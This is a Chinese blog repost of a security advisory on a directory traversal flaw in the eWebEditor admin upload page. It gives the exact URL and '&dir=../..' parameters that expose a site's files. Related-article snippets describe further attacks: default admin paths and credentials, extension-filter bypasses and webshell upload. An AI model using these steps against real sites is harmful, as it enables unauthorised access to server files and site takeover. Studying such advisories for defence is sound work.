ewebeditor遍历路径漏洞

最新推荐文章于 2023-10-18 14:57:35 发布
最新推荐文章于 2023-10-18 14:57:35 发布
阅读量1.2k 收藏
点赞数
文章标签: 测试 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HackCode/article/details/2742223
版权
 来源:Sebug.net
eWebEditor
描述:
eWebEditor是一个所见即所得的在线编辑器。顾名思义,就是能在网络上使用所见即所得的编辑方式进行编辑图文并茂的文章、新闻、讨论贴、通告、记事等多种文字处理应用。
ewebeditor/admin_uploadfile.asp
过滤不严,造成遍历路径漏洞
<* 参考:http://www.sebug.net,http://www.ewebeditor.net/ *>
测试方法:
[警 告]以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.****.com/../.. 看到整个网站文件了  
建议:暂无http://www.ewebeditor.net/
HackCode
关注
ewebeditor编辑器解析漏洞
cxrpty的博客
02-17 1039
实验环境:ewebeditor编辑器 实验步骤: 一、搭建环境 1.将下载好的eweb目录放到C:\Inetpub\wwwroot目录下 2.给eweb文件夹设置权限,依次点击:右键——属性——安全,将Internet 来宾用户和IIS_WAP用户得权限都设置成完全控制 3.在浏览器输入IP/eweb/admin_login.asp 即可进入到下面界面: 二、解析漏洞 ...
webeditor漏洞基础知识
Coisini的博客
05-25 1188
eWebEditor eWebEditor利用基础知识 默认后台地址:/ewebeditor/admin_login.asp 建议最好检测下admin_style.asp文件是否可以直接访问 后台:admin/ewebeditor/admin_login.asp 数据库:admin/ewebeditor/db/ewebeditor.mdb 限制ASP 改成asaspp aaspsp ...
Ewebeditor 的一些漏洞总结
eldn__的专栏
06-23 1万+
于是像windows一样被黑客们挖掘出很多漏洞,大家莫急,笔者Minghacker总结前人基础,一一道来。  对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点:  默认,遍历目录漏洞,一句话,注入,构造,cookie欺骗,社工(踩脚印入侵),  NO1.ewebeditor编辑器一般默认数据库路径是db/ewebeditor.mdb  默认的后台路径是admi
Ewebeditor最新漏洞漏洞大全
weixin_34357928的博客
08-02 298
Ewebeditor最新漏洞漏洞大全[收集] 来源:转载作者:佚名时间:2009-06-03 00:04:26 下面文章收集转载于网络:) 算是比較全面的ewebeditor编辑器的漏洞收集,如今的站点大多数用的都是ewebeditor编辑器, 所以ewebeditor漏洞的危害性还是相当大的,做了一下漏洞收集,漏洞修补的方法可去网上查找。 漏洞更新日期TM: 2009 2...
eWebEditor漏洞
Priate
02-14 787
 修复eWebEditor漏洞需要注意以下几个方面以下是我的个人总结,只代表个人观点1.修改eWebEditor的数据库名字.2.删除eWebEditor后台管理文件3.修改Upload.asp文件在Upload.asp文件里面,找到这句话sAllowExt = Replace(UCase(sAllowExt), "ASP", "")把这句话替换为Do While
ewebeditor 2.8.0目录遍历漏洞——漏洞复现
W小哥
12-15 818
第一步:访问目标网站 第二步:输入用户名密码admin、admin进行登录 第三步:选择上传文件,样式目录,默认uploadfile文件夹下面没有任何文件,手动复制一些进去即可 第四步:点击第一个文件夹后如下图所示,发现URL发生变化,出现dir=Count 第五步:用…/代替,形成目录遍历漏洞 ...
ewebeditor编辑器漏洞
最新发布
arissa666的博客
10-18 644
网页在线编辑器,权限限制不严格,弱口令,文件过滤出现问题。
ewebeditor漏洞与防范专题资源
10-07
使用安全的文件名生成策略,避免路径遍历攻击。对上传的文件进行扫描,检测并阻止恶意文件。 4. **权限管理**:实现细粒度的权限控制,确保每个用户只能访问和修改他们被授权的内容。避免使用硬编码的管理员账号和...
网页编辑器漏洞大全
07-13
此外,eWebEditor遍历目录漏洞允许攻击者浏览服务器上的非公开目录,进一步可能泄露内部文件。eWebEditor 5.2版本的一个列目录漏洞则让攻击者能够直接列出服务器目录内容,增加数据泄露的风险。 Cuteditor、...
eWebEditor JSP版
09-22
同时,为了防止文件上传漏洞,开发者应确保服务器端代码能有效验证文件类型、大小,甚至进行文件重命名以避免路径遍历攻击。 为了适应不同的项目需求,eWebEditor还支持定制化。开发者可以通过修改CSS样式来自定义...
eWebeditor JSP 王志峰修改版
06-01
【版本更新说明】 ·Tomcat环境下,修订图片、flash、多媒体以及附件上传后路径问题; 部署方式: 1、把文件夹下除WEB-INF文件夹的全部文件复制到您的网站根目录下; 2、把WEB-INF文件夹下的style.xml和button.xml复制到网站根目录的WEB-INF下; 3、把WEB-INF文件夹下的lib目录中的jar文件复制到网站根目录的WEB-INF的lib目录; 4、把WEB-INF文件夹下的class目录中的文件复制到网站根目录的WEB-INF的class目录; 5、把WEB-INF文件夹下的web.xml文件中的一下部分粘贴到网站根目录的WEB-INF的web.xml中; <display-name>defaultroot</display-name> <servlet> <servlet-name>debugjsp</servlet-name> <description>Added to compile JSPs with debug info</description> <servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class> <init-param> <param-name>classdebuginfo</param-name> <param-value>true</param-value> </init-param> <load-on-startup>3</load-on-startup> </servlet> <servlet-mapping> <servlet-name>debugjsp</servlet-name> <url-pattern>*.jsp</url-pattern> </servlet-mapping> 6、重新启动服务器即可。
常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor
10-28
常用网页编辑器漏洞手册(全面版)fckeditor,ewebeditor,使用这类编辑器的朋友一定要注意下。
eWebEditor for jsp完全版
01-05
eWebEditor for jsp完全版
ewebeditor漏洞ewebeditor漏洞攻击
zxmsmile的专栏
07-24 959
<br /> ewebeditor漏洞ewebeditor漏洞攻击<br />     先从最基本的记录起!通常入侵ewebeditor编辑器的步骤如下:<br />1、首先访问默认管理页看是否存在。<br />        默认管理页地址2.80以前为 ewebeditor/admin_login.asp 以后版本为admin/login.asp (各种语言的大家自己改后缀,本文就以asp来进行说明,下面不再细说了!)<br />2、默认管理帐号密码!<br />        默认管理页存在!我们就
ewebeditor漏洞大全
热门推荐
xysoul的专栏
03-23 1万+
1:默认管理后台: http://www.backlion.com/ewebeditor/admin_login.asp 后台如果能进入: 可点击样式管理: standard 拷贝一份(直接修改改不了) 在拷贝的一份里加入图片类型( asa aaspsp )   然后点预览 在编辑器里点设计    然后直接上传asa大马. 上传后 在代码里可以看到马的位置!
ewebeditor漏洞总结 (从web服务器管理中得到……与大家分享,请不要做坏事)
photon
12-17 3307
ewebeditor漏洞集(劝大家不要做坏事)一、<span class="t_tag" onclick="function onclick(){tagshow(event)}">后台上马<span class="t_tag" onclick="function onclick(){tagshow(event)}">漏洞各位<span class="t_tag" onc
ewebeditor漏洞之目录遍历漏洞
weixin_33790053的博客
01-03 593
这里大概说一下!目录遍历漏洞基本存在于ewebeditor/admin_uploadfile.asp 高版本的是ewebeditor/admin/upload.asp 文件!这个文件有的不需要登陆验证,有些需要!很多有经验的管理员会把编辑器的目录设置为只读权限,不可修改!这种情况下,唯一可以利用的也就是利用遍历 目录功能查看网站文件,比如数据库路径、后台地址、其他的上...
漏洞复现篇——ewebeditor编辑器解析漏洞
爱国小白帽
02-18 4243
在线web编辑器,也叫做富文本 编辑器。 富文本编辑器,Rich Text Editor, 简称 RTE, 是一种可内嵌于浏览器,所见即所得的文本编辑器。 富文本编辑器不同于文本编辑器,程序员可到网上下载免费的富文本编辑器内嵌于自己的网站或程序里(当然付费的功能会更强大些),方便用户编辑文章或信息。比较好的文本编辑器有kindeditor,fckeditor等。 这样的程序,能够在网站上写文档的...
ewebeditor漏洞
08-23
综上所述,ewebeditor存在文件上传漏洞,攻击者可以通过利用漏洞访问服务器上的文件,并进行恶意操作。建议用户及时更新并使用最新版本的编辑器,以避免潜在的安全风险。<span class="em">1</span><span class="em">...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值